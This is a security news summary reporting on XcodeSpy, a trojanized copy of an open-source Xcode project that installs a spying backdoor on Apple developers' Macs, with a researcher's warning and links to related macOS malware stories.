Security News > 2021 > March > Trojanized Xcode Project Slips MacOS Malware to Apple Developers
Cybercriminals are targeting Apple developers with a trojanized Xcode project, which once launched installs a backdoor that has spying and data exfiltration capabilities.
Xcode is comprised of a suite of free, open software development tools developed by Apple for creating software for macOS, iOS, iPadOS, watchOS and tvOS. Thus, any apps built on top of the project automatically include the malicious code.
"The XcodeSpy infection vector could be used by other threat actors, and all Apple Developers using Xcode are advised to exercise caution when adopting shared Xcode projects," said Phil Stokes, researcher with SentinelLabs on Thursday.
The trojanized Xcode project is a doctored version of a legitimate, open-source project that's available on GitHub called TabBarInteraction; this project offers iOS developers several advanced features for animating the iOS Tab Bar based on user interaction.
Attackers have previously utilized Xcode as an initial attack vector to target Apple platform developers.
"While XcodeSpy appears to be directly targeted at the developers themselves rather than developers' products or clients, it's a short step from backdooring a developer's working environment to delivering malware to users of that developer's software," said researchers.
News URL
https://threatpost.com/xcode-macos-malware-apple-developers/164897/
Related news
- N. Korean Hackers Use Fake Interviews to Infect Developers with Cross-Platform Malware (source)
- macOS HM Surf vuln might already be under exploit by major malware family (source)
- BeaverTail Malware Resurfaces in Malicious npm Packages Targeting Developers (source)
- North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS (source)
- North Korean hackers use new macOS malware against crypto firms (source)
- North Korean Hackers Target macOS Using Flutter-Embedded Malware (source)
- New RustyAttr Malware Targets macOS Through Extended Attribute Abuse (source)
- Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) (source)